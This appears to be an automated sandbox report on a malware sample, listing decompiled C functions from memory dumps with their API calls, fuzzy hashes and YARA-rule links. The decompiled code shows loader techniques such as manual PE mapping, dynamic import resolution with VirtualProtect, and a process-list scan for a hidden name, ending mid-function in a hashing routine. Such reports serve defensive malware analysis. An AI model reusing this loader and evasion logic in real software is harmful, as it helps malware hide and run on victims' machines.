Part of subcall function 04F61D8C: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,04F6991D,3D04F6C0,80000002,04F629E4,00000000,04F629E4,?,65696C43), ref: 04F61DF3
Part of subcall function 04F61D8C: RegCloseKey.ADVAPI32(80000002,?,04F6991D,3D04F6C0,80000002,04F629E4,00000000,04F629E4,?,65696C43,80000002,00000000,?), ref: 04F61E23

HeapFree.KERNEL32(00000000,?,00000000,80000002,74E5F710,?,?,74E5F710,00000000,?,04F68408,?,004F0053,05E79320,00000000,?), ref: 04F686E1

Strings

Ut, xrefs: 04F686E1

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseFreeHeap
String ID: Ut
API String ID: 2109406458-8415677
Opcode ID: 780a545a19034dbed3e16f10dd4001d833deb94e904d318441af4728f31c2578
Instruction ID: 7a257667e2634a9f73c34fad1c5681eb71d2dcc07ec1cb80b2a3c5d0562ce728
Opcode Fuzzy Hash: 780a545a19034dbed3e16f10dd4001d833deb94e904d318441af4728f31c2578
Instruction Fuzzy Hash: 50016D3620024DFBDB12DF45CC01FAA3B76FB84395F14842CFA1B9A150DA71E922DB54

Uniqueness

Uniqueness Score: -1.00%

Function 04F6423D, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement( &E04F6D1F4) == 0) {
						E04F621AD();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement( &E04F6D1F4) == 1) {
						_t10 = E04F6271A(_t11, _t12, 1, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x04f64244
0x04f64245
0x04f64248
0x04f6427a
0x04f6427c
0x04f6427c
0x04f6424a
0x04f6424b
0x04f64260
0x04f64267
0x04f64269
0x04f64269
0x04f64267
0x04f6424b
0x04f64284

APIs

InterlockedIncrement.KERNEL32(04F6D1F4), ref: 04F64252

Part of subcall function 04F6271A: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,?,04F64265,?), ref: 04F62727

InterlockedDecrement.KERNEL32(04F6D1F4), ref: 04F64272

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 5cc4abc7550de3c3908d1c6008f79ca65538e6227d0f4bc524bcdd924d41f70a
Instruction ID: 7ff9f225e29a45477080d9a97171d115c7e5a66e2a93d25dc5b3a205bdf0a7bf
Opcode Fuzzy Hash: 5cc4abc7550de3c3908d1c6008f79ca65538e6227d0f4bc524bcdd924d41f70a
Instruction Fuzzy Hash: 18E04821F041259B97617AB49C44B7E7954DB40784B214614E4A3E1498D650E8C79A95

Uniqueness

Uniqueness Score: -1.00%

Function 00419F90, Relevance: 3.0, APIs: 2, Instructions: 19librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(030226E4,004283E8), ref: 00419FA9
VirtualProtect.KERNELBASE(02F71A10,031D6658,?,?), ref: 00419FCA

Memory Dump Source

Source File: 00000000.00000002.575989176.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: AddressProcProtectVirtual
String ID:
API String ID: 3759838892-0
Opcode ID: 5834e85aef56fb708d6e50faf8ce63a93d9262bd6fc948e303c1f2caa9c2efab
Instruction ID: bd5550c9394fecc5ea87a35ed42759144240bd715c39d5e1d9d4550d6ebf3fb8
Opcode Fuzzy Hash: 5834e85aef56fb708d6e50faf8ce63a93d9262bd6fc948e303c1f2caa9c2efab
Instruction Fuzzy Hash: 9FE01AB5A05200AFE314EB94F844E2A77B8BB58701F80481CE48582205D6385858CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401BBE, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00401BBE(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E00401689( &_v8,  &_v12,  *0x403100 ^ 0x239770ca) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E00401F0D(_t22, _v8,  *0x403100 ^ 0x54b37a7c);
					}
					if(_t29 != 0) {
						_t15 = E00401ED0(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x4030e0, 0, _v8);
				}
				return _t25;
			}

0x00401bbe
0x00401bc1
0x00401bc2
0x00401bd8
0x00401be1
0x00401be6
0x00401bff
0x00401be8
0x00401bfb
0x00401bfb
0x00401c03
0x00401c05
0x00401c0d
0x00401c15
0x00401c1d
0x00401c1f
0x00401c1f
0x00401c1d
0x00401c2f
0x00401c2f
0x00401c3a

APIs

StrStrIA.KERNELBASE(00000000,00000000,?,00000000,?,00000000,-00000008,?,?,?,004018B6,?,00000000), ref: 00401C15
HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,-00000008,?,?,?,004018B6,?,00000000), ref: 00401C2F

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0108bd2501a3a05925f53a8a5000649a86b3fff717fdab041151c502182f32d5
Instruction ID: 46563b4ffdbdd0ab44d676c73926da54e0512ac98c33cda228cb2256cd60c241
Opcode Fuzzy Hash: 0108bd2501a3a05925f53a8a5000649a86b3fff717fdab041151c502182f32d5
Instruction Fuzzy Hash: 4301A276A01118BBDB11DBA2DD04EEF7BBDAB88741F140176FA01F72A0D675DA0097A8

Uniqueness

Uniqueness Score: -1.00%

Function 04F617DE, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04F617DE(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4f6d230; // 0xf0a5a8
				_t4 = _t15 + 0x4f6e394; // 0x5e7893c
				_t20 = _t4;
				_t6 = _t15 + 0x4f6e124; // 0x650047
				_t17 = E04F62AF0(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04F61364(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x04f617e8
0x04f617ea
0x04f617f1
0x04f617f2
0x04f617f3
0x04f617f4
0x04f617fa
0x04f617ff
0x04f617ff
0x04f61809
0x04f6181b
0x04f61822
0x04f61851
0x04f61824
0x04f61829
0x04f6184e
0x04f6182b
0x04f6182e
0x04f61835
0x04f61840
0x04f61837
0x04f6183a
0x04f6183a
0x04f61844
0x04f61844
0x04f61829
0x04f61858

APIs

Part of subcall function 04F62AF0: SysFreeString.OLEAUT32(?), ref: 04F62BCF

Part of subcall function 04F61364: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04F64321,004F0053,00000000,?), ref: 04F6136D
Part of subcall function 04F61364: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04F64321,004F0053,00000000,?), ref: 04F61397
Part of subcall function 04F61364: memset.NTDLL ref: 04F613AB

SysFreeString.OLEAUT32(00000000), ref: 04F61844

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: d185e7c1e7a62a67b2b6a9f6d20a460d83e557f4d07cacbd06b658032f7b27e9
Instruction ID: f0d48f7c364d32af1d94b0787ebd05993adf66f190ed7c9cea9f55a598ebf715
Opcode Fuzzy Hash: d185e7c1e7a62a67b2b6a9f6d20a460d83e557f4d07cacbd06b658032f7b27e9
Instruction Fuzzy Hash: 8D017132A00119BFDF51AFA8DE049AEBBB8FB04710F014465E91AE7121E7B0BD56D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 04F6AAF6, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F6AAF6() {

				E04F6ABB6(0x4f6c34c, 0x4f6d128); // executed
				goto __eax;
			}

0x04f6aaed
0x04f6aaf4

APIs

___delayLoadHelper2@8.DELAYIMP ref: 04F6AAED

Part of subcall function 04F6ABB6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04F6AC2F

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 45f5222a4a0847ec07d26fd27a61f4cc66bc3e87ead8ea77b6af3f9011664388
Instruction ID: f2adaa494fa88384647cac55734f024b9d994d8a6c579c9a079ac067766b1ce2
Opcode Fuzzy Hash: 45f5222a4a0847ec07d26fd27a61f4cc66bc3e87ead8ea77b6af3f9011664388
Instruction Fuzzy Hash: B0B01292798101EE3054B10C3E03C37014CD1C2A14320C10BF443E0200EC80BC871532

Uniqueness

Uniqueness Score: -1.00%

Function 04F6AADB, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F6AADB() {

				E04F6ABB6(0x4f6c34c, 0x4f6d12c); // executed
				goto __eax;
			}

0x04f6aaed
0x04f6aaf4

APIs

___delayLoadHelper2@8.DELAYIMP ref: 04F6AAED

Part of subcall function 04F6ABB6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04F6AC2F

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 54adecf94950f83d08392ada93c22512ba7fc23b408906a37ed6039e9a01f614
Instruction ID: 4863eb541567221a8563f3ffbb364197b59c8abb656d110e89e2706a67faf10d
Opcode Fuzzy Hash: 54adecf94950f83d08392ada93c22512ba7fc23b408906a37ed6039e9a01f614
Instruction Fuzzy Hash: D9B01292798001FE3014B1183E07C37010DD1C3A14320C00BF843F0100FC80FC471432

Uniqueness

Uniqueness Score: -1.00%

Function 00401E3E, Relevance: 1.3, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401E3E(void* __eax, void* __edx) {
				char _v8;
				void* _v12;
				void* __ebx;
				void* _t17;
				long _t23;
				long _t25;
				char _t28;
				void* _t31;
				long _t33;
				void* _t35;
				intOrPtr* _t36;
				void* _t38;

				_t31 = __edx;
				_t35 = __eax;
				_t17 = E00401C6B( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t33 = 8;
					goto L8;
				} else {
					_t28 = _v8;
					_t33 = E004019B4( &_v8, _t28, _t35);
					if(_t33 == 0) {
						_t38 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
						_t23 = E00401AA1(_t28, _t38); // executed
						_t33 = _t23;
						if(_t33 == 0) {
							_t25 = E004017B2(_t38, _t31, _t28); // executed
							_t33 = _t25;
							if(_t33 == 0) {
								_push(_t25);
								_push(1);
								_push(_t28);
								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t28))() == 0) {
									_t33 = GetLastError();
								}
							}
						}
					}
					_t36 = _v12;
					 *((intOrPtr*)(_t36 + 0x18))( *((intOrPtr*)(_t36 + 0x1c))( *_t36));
					E0040159E(_t36);
					L8:
					return _t33;
				}
			}

0x00401e3e
0x00401e46
0x00401e63
0x00401e6a
0x00401ec8
0x00000000
0x00401e6c
0x00401e6c
0x00401e76
0x00401e7a
0x00401e7f
0x00401e82
0x00401e87
0x00401e8b
0x00401e90
0x00401e95
0x00401e99
0x00401e9e
0x00401e9f
0x00401ea3
0x00401ea8
0x00401eb0
0x00401eb0
0x00401ea8
0x00401e99
0x00401e8b
0x00401eb2
0x00401ebb
0x00401ebf
0x00401ec9
0x00401ecf
0x00401ecf

APIs

Part of subcall function 00401C6B: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,00401E68,?,?,?,00000002,?,?,?), ref: 00401C90
Part of subcall function 00401C6B: GetProcAddress.KERNEL32(00000000,?), ref: 00401CB2
Part of subcall function 00401C6B: GetProcAddress.KERNEL32(00000000,?), ref: 00401CC8
Part of subcall function 00401C6B: GetProcAddress.KERNEL32(00000000,?), ref: 00401CDE
Part of subcall function 00401C6B: GetProcAddress.KERNEL32(00000000,?), ref: 00401CF4
Part of subcall function 00401C6B: GetProcAddress.KERNEL32(00000000,?), ref: 00401D0A

Part of subcall function 004019B4: memcpy.NTDLL(?,00000002,00401E76,00000002,0000000A,?,?,?,00401E76,?,0000000A,?,?,?,00000002), ref: 004019E1
Part of subcall function 004019B4: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 00401A14

Part of subcall function 00401AA1: LoadLibraryA.KERNELBASE(00000002,00000002,00000000,?,?,?,00000002), ref: 00401AD3
Part of subcall function 00401AA1: lstrlenA.KERNEL32(00000002), ref: 00401AE9
Part of subcall function 00401AA1: memset.NTDLL ref: 00401AF3
Part of subcall function 00401AA1: GetProcAddress.KERNEL32(?,00000002), ref: 00401B56
Part of subcall function 00401AA1: lstrlenA.KERNEL32(-00000002), ref: 00401B6B
Part of subcall function 00401AA1: memset.NTDLL ref: 00401B75

Part of subcall function 004017B2: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,00000000,00000002,?,?,00000002), ref: 004017E0
Part of subcall function 004017B2: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00401837
Part of subcall function 004017B2: GetLastError.KERNEL32(?,?), ref: 0040183D

GetLastError.KERNEL32(?,?,?,?), ref: 00401EAA

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
String ID:
API String ID: 33504255-0
Opcode ID: 3421d7e033874ec3b11024936bf927f524599c1da211785a98b5db315ca878a2
Instruction ID: 9062f8911cd8229a27a84269f8f0c5d667b7019286846bd61fd1d881dc0691d6
Opcode Fuzzy Hash: 3421d7e033874ec3b11024936bf927f524599c1da211785a98b5db315ca878a2
Instruction Fuzzy Hash: E611C6776006116BD7219669CC85E9F73BC9F84354B15013AFD41F7391EA78EC0187E8

Uniqueness

Uniqueness Score: -1.00%

Function 04F6655F, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E04F6655F(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x04f6655f
0x04f6656c
0x04f6656d
0x04f6656e
0x04f66575
0x04f665a3
0x04f665a4
0x04f665a7
0x04f665ad
0x00000000
0x00000000
0x04f6658c
0x04f66596
0x04f6659d
0x00000000
0x04f6658e
0x04f66591
0x04f665b1
0x04f66593
0x04f66593
0x00000000
0x04f66593
0x04f66591
0x04f665b8
0x04f665be
0x04f665be
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 04F665A7

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: deae0b006df32050f258ed7b9a301f52c001b68cf920898f4dd5b200be31c899
Instruction ID: 6777fa2fccb33c610c098480c3a17ba6585a13bf154119e65c1e7fa1db32a84d
Opcode Fuzzy Hash: deae0b006df32050f258ed7b9a301f52c001b68cf920898f4dd5b200be31c899
Instruction Fuzzy Hash: 05F03772D01218FFEB00DB94C489AEDB7B8EF19304F1080AAE502A3204E3B46F85CB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00419FF0, Relevance: 15.0, APIs: 10, Instructions: 48libraryfilepipeCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000), ref: 0041A008
CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041A01E
GetVersionExA.KERNEL32(00000000), ref: 0041A028
DeactivateActCtx.KERNEL32(00000000,00000000), ref: 0041A032
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A042
WritePrivateProfileStructA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A052
IsDBCSLeadByteEx.KERNEL32(00000000,00000000), ref: 0041A05C
SetFileApisToOEM.KERNEL32 ref: 0041A062
TlsGetValue.KERNEL32(00000000), ref: 0041A06A
GetThreadPriority.KERNEL32(00000000), ref: 0041A072

Memory Dump Source

Source File: 00000000.00000002.575989176.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: FileWrite$ApisByteCreateDeactivateLeadLibraryLoadNamedPipePriorityPrivateProfileStructThreadValueVersion
String ID:
API String ID: 1094781569-0
Opcode ID: d67aad1ff14e83aadbe77ec2d9ff8841a815faeba134a726652a9a5487f9f117
Instruction ID: 28f73ab95f2d05b3dfd2acdec67329513c70b42bae8b8279ce277305926c523f
Opcode Fuzzy Hash: d67aad1ff14e83aadbe77ec2d9ff8841a815faeba134a726652a9a5487f9f117
Instruction Fuzzy Hash: 07019C35789340ABF7706BA0FC4EF543BA0BB09B06F904064F74A995D2CAB5515A8B2A

Uniqueness

Uniqueness Score: -1.00%

Function 04F6365A, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04F6365A() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4f6d230; // 0xf0a5a8
						_t2 = _t9 + 0x4f6edec; // 0x73617661
						_push( &_v264);
						if( *0x4f6d114() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x04f63665
0x04f6366f
0x04f63673
0x04f6367d
0x04f636ae
0x04f63684
0x04f63689
0x04f63696
0x04f6369f
0x04f636b6
0x04f636a1
0x04f636a9
0x00000000
0x04f636a9
0x04f636b7
0x04f636b8
0x00000000
0x04f636b8
0x00000000
0x04f636b2
0x04f636be
0x04f636c3

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04F6366A
Process32First.KERNEL32(00000000,?), ref: 04F6367D
Process32Next.KERNEL32(00000000,?), ref: 04F636A9
CloseHandle.KERNEL32(00000000), ref: 04F636B8

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f472bacbb0a5de777b7009b20936b8106e54a986a6f1db6c2a9b478588628821
Instruction ID: d1f7f3805f4c6d8f1a9fe69ea623d1a1647a9de3abfa9fe44375914dac546a9a
Opcode Fuzzy Hash: f472bacbb0a5de777b7009b20936b8106e54a986a6f1db6c2a9b478588628821
Instruction Fuzzy Hash: DEF0B432601068AAE721AA669D08DEB77ACEBC5314F000061ED57C3100EA65EE5B8AB2

Uniqueness

Uniqueness Score: -1.00%

Function 00401A35, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401A35() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x4030f0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x4030fc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x4030ec = _t3;
					_t5 = GetCurrentProcessId();
					 *0x4030e8 = _t5;
					 *0x4030f0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x4030e4 = _t6;
					if(_t6 == 0) {
						 *0x4030e4 =  *0x4030e4 | 0xffffffff;
					}
					return 0;
				}
			}

0x00401a36
0x00401a44
0x00401a4c
0x00401a51
0x00401a9b
0x00401a9b
0x00401a53
0x00401a5b
0x00401a97
0x00401a99
0x00401a5d
0x00401a5d
0x00401a62
0x00401a70
0x00401a75
0x00401a7b
0x00401a83
0x00401a88
0x00401a8a
0x00401a8a
0x00401a94
0x00401a94

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040186F,?,00000000), ref: 00401A44
GetVersion.KERNEL32(?,00000000), ref: 00401A53
GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401A62
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401A7B

Memory Dump Source

Source File: 00000000.00000002.575966027.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.575971229.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.575976089.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 20131103d87c33f0acc970f42653c09de4196513154c1bda52d5631c3f3faa99
Instruction ID: 852212c6a080d1da782559ba9f42047b9219e41c85d3a1e334c6ecef845be3e1
Opcode Fuzzy Hash: 20131103d87c33f0acc970f42653c09de4196513154c1bda52d5631c3f3faa99
Instruction Fuzzy Hash: 6EF0F971B823119EE7609F68BF0AB953F68A704712F108137F215F61E4D3B145419F5C

Uniqueness

Uniqueness Score: -1.00%

Function 04F62D68, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E04F62D68(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
